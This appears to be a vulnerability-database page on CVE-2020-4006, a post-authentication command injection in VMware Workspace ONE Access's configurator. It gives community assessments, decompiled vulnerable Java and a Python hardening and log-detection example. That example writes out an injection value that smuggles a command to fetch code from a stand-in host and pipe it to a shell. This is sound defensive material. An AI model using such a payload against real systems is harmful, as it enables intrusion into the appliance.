Attacker Value
High
(2 users assessed)
Exploitability
Low
(2 users assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network
3

CVE-2020-4006

Disclosure Date: November 23, 2020
Exploited in the Wild

Description

VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector have a command injection vulnerability in the administrative configurator service (TCP port 8443). An attacker who can reach that interface and holds valid administrator credentials for the configurator can execute arbitrary shell commands on the appliance.

Following speculation that CVE-2020-4006 might be related to the SolarWinds supply chain compromise that affected U.S. government agencies and organizations worldwide, VMware stated on December 22, 2020 that it had no indication of any involvement in the nation-state attack on SolarWinds.


6
Ratings
  • Attacker Value
    High
  • Exploitability
    Low
Technical Analysis

I’ve seen some news headlines with very scary-sounding words (“ransacking networks!”) on this, which is dismaying. It’s completely understandable that folks would be alarmed by a zero-day (now patched), but when we get into the details of this one a bit, I would tend to doubt that it’s going to be a good candidate for mass exploitation (note that I’m not telling anyone not to patch, just that headlines aren’t always reality!).

Even before getting into the weeds a little more, we can see from the CVSSv3 metrics that this requires high-privileged access and carries a 7.2 severity rating. I’ve watched researchers prove severity ratings wrong in the past, to be sure, but looking at the advisory, we can see that any attempt at exploitation would require an attacker to have access to the admin configurator on port 8443, plus admin credentials for the configurator account. If you have that level of access as an attacker, you can do all sorts of nefarious things with it, but those requirements don’t lend themselves to easy exploitation. It’s a good one to patch, but it also sounds like this is another case where strong password policies (especially for admin accounts!) would go a long way toward mitigating the risk of vulns both known and unknown. Ensuring that management interfaces are not exposed to the internet is another good move!

The NSA reported this vulnerability to VMware directly as a zero-day, which likely means they were seeing a specific threat actor deploy it in targeted intelligence operations. We haven’t seen any other reports of exploitation yet. From reading the docs, it looks like admins are required to change the password upon configuration, so the tried and true combo of admin:admin shouldn’t be possible.

2
Technical Analysis

Please read @ccondon-r7’s excellent assessment of CVE-2020-4006. The following is a technical analysis of the vulnerability.

I decided to revisit CVE-2020-4006 after it (and other vulnerabilities) received renewed attention for use in a nation-state actor’s TTPs. I also managed to obtain the software this time. I did not manage to obtain the patch, so the following analysis is a “best effort” attempt to deduce the vulnerability.

CVE-2020-4006 is a post-auth command injection in VMware Workspace ONE Access and multiple related products. The vulnerability appears to be in the /cfg/ssl/installSelfSignedCertificate endpoint within the “Appliance Configurator” service on HTTPS port 8443. By specifying a malicious san parameter in a POST request to the endpoint, arbitrary shell commands can be executed.

  @RequestMapping(method = {RequestMethod.POST}, value = {"/installSelfSignedCertificate"})
  @ResponseBody
  public AjaxResponse installSelfSignedCertificate(MultipartHttpServletRequest request) {
    try {
      log.debug("Generating and installing self-signed sslCertificate");
      this.workspacePreAuthFilter.storePasswordInSession((HttpServletRequest)request);
      this.applianceSslCertificateService.generateAndInstallSelfSignedCertificate(request);
    } catch (AdminPortalException e) {
      return new AjaxResponse(Messages.getMessage(e.getErrorId(), e.getArgs()), Integer.valueOf(2), false);
    }
    return new AjaxResponse(Messages.getMessage("configurator.configure.ssl.installingCertificate"), Integer.valueOf(0), true);
  }
  public void generateAndInstallSelfSignedCertificate(MultipartHttpServletRequest request) throws AdminPortalException {
    // "san" is read straight from the (authenticated) POST body and is never validated.
    String generateSelfSignedCertCmd[], installSelfSignedCertificateCmd[], sanValue = request.getParameter("san");

    String vmName = this.configHelper.getApplianceFqdn();


    if (StringUtils.isAllEmpty(new CharSequence[] { sanValue })) {
      sanValue = vmName;
    } else if (!sanValue.contains(vmName)) {
      sanValue = sanValue + "," + vmName;   // appended, not sanitized
    }

    if (Const.isWindowsDeployment) {
      // Windows: sanValue is wrapped in double quotes but not escaped before cmd /c parses it.
      generateSelfSignedCertCmd = new String[] { "cmd", "/c", "\"\"" + SELF_SIGNED_CERTIFICATE_CMD + "\"" + " -host " + vmName + " -san " + "\"" + sanValue + "\"" + " -force" + "\"" };
    } else {
      // Linux sink: sanValue is concatenated into one string that /bin/sh -c parses,
      // so shell metacharacters in the san parameter become additional commands.
      generateSelfSignedCertCmd = new String[] { "/bin/sh", "-c", SELF_SIGNED_CERTIFICATE_CMD + " --makesslcert " + vmName + " " + vmName + " " + sanValue };
    }

    log.info("Executing command {}", Arrays.toString((Object[])generateSelfSignedCertCmd));

    try {
      CommandUtils.executeCommand(generateSelfSignedCertCmd);
      log.info("Command {} succeeded", Arrays.toString((Object[])generateSelfSignedCertCmd));
    } catch (IOException e) {
      log.error("Command {} failed: {}", Arrays.toString((Object[])generateSelfSignedCertCmd), e.getMessage());
      throw new AdminPortalException(null, "configurator.configure.ssl.errorGeneratingSelfSignedCertificate", null);
    }



    if (Const.isWindowsDeployment) {
      installSelfSignedCertificateCmd = new String[] { "cmd", "/c", "\"\"" + SELF_SIGNED_CERTIFICATE_CMD + "\"" + " -host " + vmName + " -install" + "\"" };
    } else {
      installSelfSignedCertificateCmd = new String[] { "/bin/sh", "-c", String.format("nohup %s > /usr/local/horizon/log/installSelfSignedCert.log &", new Object[] { SELF_SIGNED_CERTIFICATE_CMD }) };
    }

    log.info("Executing command {}", Arrays.toString((Object[])installSelfSignedCertificateCmd));
    try {
      CommandUtils.executeCommand(installSelfSignedCertificateCmd);
      log.info("Command {} succeeded", Arrays.toString((Object[])installSelfSignedCertificateCmd));
    } catch (IOException e) {
      log.error("Command {} failed: {}", Arrays.toString((Object[])installSelfSignedCertificateCmd), e.getMessage());
      throw new AdminPortalException(null, "configurator.configure.ssl.errorInstallingCertificate", null);
    }

    if (Const.isWindowsDeployment &&
      !this.tomcatUtils.restartApplianceService((HttpServletRequest)request)) {
      throw new AdminPortalException("configurator.configure.workspaceUrl.errorRestartingService", null);
    }
  }

Note that exploitation may restart the service. Activity is logged in the /opt/vmware/horizon/workspace/logs/configurator.log file.
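
The two things a practitioner wants from the analysis above, as an added example that is not code from this page, from VMware, or from the assessment author, and written in Python rather than the appliance's Java: a hardened argv builder that validates the `san` parameter and never passes through `/bin/sh -c`, shown beside a mirror of the vulnerable string so the difference is visible, and a scanner for the `Executing command` lines the service writes to configurator.log at INFO level. The script path, the timestamp layout, the hostnames and the sample log lines are constructed assumptions (the real `SELF_SIGNED_CERTIFICATE_CMD` value is not on the page), and the exact log line format is inferred from the `log.info("Executing command {}", Arrays.toString(...))` call in the decompiled code.

```python
import re
from typing import Iterable, List

# Conservative grammar for one SAN entry: a DNS hostname or an IPv4 literal.
# Shell metacharacters, whitespace and a leading '-' fail both patterns.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def parse_san(san: str) -> List[str]:
    """Split a comma-separated SAN list; reject any entry that is not a hostname or IPv4 literal."""
    entries: List[str] = []
    for raw in san.split(","):
        entry = raw.strip()
        if not entry:
            continue
        if not (_HOSTNAME.match(entry) or _IPV4.match(entry)):
            raise ValueError(f"invalid SAN entry: {entry!r}")
        entries.append(entry)
    return entries


def san_is_valid(san: str) -> bool:
    """Boolean form of parse_san, for callers that only need accept/reject."""
    try:
        parse_san(san)
        return True
    except ValueError:
        return False


def vulnerable_shell_string(script: str, vm_name: str, san: str) -> str:
    """Mirror of the Linux branch in the decompiled code: the string handed to `/bin/sh -c`.

    `san` is pasted in verbatim, so `;`, `|`, `$(...)` and friends are parsed by the shell."""
    if not san:
        san = vm_name
    elif vm_name not in san:
        san = san + "," + vm_name
    return f"{script} --makesslcert {vm_name} {vm_name} {san}"


def build_makesslcert_argv(script: str, vm_name: str, san: str) -> List[str]:
    """Hardened builder: validated SAN list, one argv element per value, no shell involved.

    Run it with subprocess.run(argv) (shell=False). The SAN list stays a single
    argument, exactly as the original command line passes it."""
    entries = parse_san(san)
    if vm_name not in entries:
        entries.append(vm_name)
    return [script, "--makesslcert", vm_name, vm_name, ",".join(entries)]


# Detection: the service logs each command line via Arrays.toString(), i.e.
# "Executing command [/bin/sh, -c, <command string>]" (format inferred, not copied).
_EXEC_LINE = re.compile(r"Executing command \[(?P<argv>.*)\]")
_SHELL_META = re.compile(r"[;&|`$(){}<>\\]")


def find_injection_attempts(log_lines: Iterable[str]) -> List[str]:
    """Return configurator.log lines whose --makesslcert arguments contain shell metacharacters."""
    hits: List[str] = []
    for line in log_lines:
        m = _EXEC_LINE.search(line)
        if not m or "--makesslcert" not in m.group("argv"):
            continue
        args_after_flag = m.group("argv").split("--makesslcert", 1)[1]
        if _SHELL_META.search(args_after_flag):
            hits.append(line)
    return hits


# Constructed sample log: timestamp layout, script path and hostnames are assumptions.
SAMPLE_LOG = """\
2020-12-01 10:15:02,113 INFO  (Thread-1) ApplianceSslCertificateService - Executing command [/bin/sh, -c, /usr/local/horizon/bin/makesslcert.sh --makesslcert idm.corp.example idm.corp.example idm.corp.example,sso.corp.example]
2020-12-01 10:15:03,540 INFO  (Thread-1) ApplianceSslCertificateService - Command [...] succeeded
2020-12-01 10:16:44,002 INFO  (Thread-1) ApplianceSslCertificateService - Executing command [/bin/sh, -c, /usr/local/horizon/bin/makesslcert.sh --makesslcert idm.corp.example idm.corp.example a.corp.example;curl${IFS}http://198.51.100.7/x|sh,idm.corp.example]
"""

if __name__ == "__main__":
    payload = "a.corp.example;curl${IFS}http://198.51.100.7/x|sh"
    print("vulnerable:", vulnerable_shell_string("/usr/local/horizon/bin/makesslcert.sh", "idm.corp.example", payload))
    print("hardened rejects payload:", not san_is_valid(payload))
    print("hardened argv:", build_makesslcert_argv("/usr/local/horizon/bin/makesslcert.sh", "idm.corp.example", "sso.corp.example"))
    for hit in find_injection_attempts(SAMPLE_LOG.splitlines()):
        print("suspicious:", hit)
```

The scanner keys on the `--makesslcert` tail because the preceding path and `/bin/sh, -c` prefix are constant; on a real appliance, run it over `/opt/vmware/horizon/workspace/logs/configurator.log` and treat any hit as worth pulling the matching 8443 access log entry for.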

CVSS V3 Severity and Metrics
Base Score:
9.1 Critical
Impact Score:
6
Exploitability Score:
2.3
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Products

  • VMware Workspace One Access (Access), VMware Workspace One Access Connector (Access Connector), VMware Identity Manager (vIDM), VMware Identity Manager Connector (vIDM Connector), VMware Cloud Foundation, vRealize Suite Lifecycle Manager
